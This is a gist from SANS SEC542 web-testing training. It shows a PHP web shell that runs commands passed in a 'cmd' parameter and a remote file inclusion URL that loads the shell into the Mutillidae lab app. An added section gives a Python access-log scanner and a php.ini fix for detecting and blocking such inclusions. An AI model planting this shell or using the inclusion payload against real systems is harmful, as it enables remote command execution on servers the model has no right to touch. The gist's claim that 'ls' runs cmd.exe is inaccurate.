@mosesrenegade
Last active January 28, 2018 17:03
In SANS SEC542, we use a backdoor PHP shell. The exercise uses RFI to include a text copy of the PHP code into Mutillidae. Here is how you can 'enhance it'.
Write to a webhost:
nano /var/www/html/id.txt
Inside of id.txt we have some helper functions to debug:
<?php
echo "<pre>";
echo "This is the symbol table:";
var_dump($_REQUEST); // var_dump() prints its own output and returns nothing, so no echo is needed
echo "Commands:";
echo shell_exec($_REQUEST['cmd']);
echo "</pre>";
?>
If you copy this into a txt file, you can then request the following URL:
http://multillidae/index.php?page=http://127.0.0.1/id.txt&cmd=ls
This would result in running cmd.exe. Note that http://127.0.0.1 is used because we are hosting the file on our local host, which is also our own target.
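From the defender's side, the request above leaves a recognisable trace in the web server's access log: a query parameter whose value is itself a URL. The following is an added example, not part of the original gist, that flags such requests; the log lines are constructed samples in Combined Log Format and the function name `scan` is hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Prefixes that turn an include parameter into a remote or wrapper fetch.
REMOTE_PREFIXES = ("http://", "https://", "ftp://", "php://", "data:")

# Combined Log Format: client IP first, request line in the first quoted field.
LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def scan(lines):
    """Return one finding per query parameter whose value is a remote URL."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        # parse_qsl percent-decodes, so page=http%3A%2F%2F... is caught too.
        params = parse_qsl(parts.query, keep_blank_values=True)
        for name, value in params:
            if value.strip().lower().startswith(REMOTE_PREFIXES):
                findings.append({
                    "client": client,
                    "path": parts.path,
                    "param": name,
                    "value": value,
                    # Extra parameters (such as cmd) are what the included
                    # script reads, so keep them for triage.
                    "other_params": {k: v for k, v in params if k != name},
                })
    return findings

# Constructed sample log lines (documentation IP range), not captured traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Jan/2018:17:00:01 +0000] "GET /index.php?page=home.php HTTP/1.1" 200 5120',
    '192.0.2.44 - - [28/Jan/2018:17:01:12 +0000] "GET /index.php?page=http://127.0.0.1/id.txt&cmd=ls HTTP/1.1" 200 812',
    '192.0.2.44 - - [28/Jan/2018:17:01:40 +0000] "GET /index.php?page=http%3A%2F%2F127.0.0.1%2Fid.txt&cmd=id HTTP/1.1" 200 640',
    '192.0.2.10 - - [28/Jan/2018:17:02:03 +0000] "GET /index.php?page=login.php&next=/home HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["client"], f["path"], f["param"], "->", f["value"], f["other_params"])
```

Setting `allow_url_include = Off` in php.ini blocks the include itself. Parameters that legitimately carry URLs (redirect targets, for example) will also match this check and need triage.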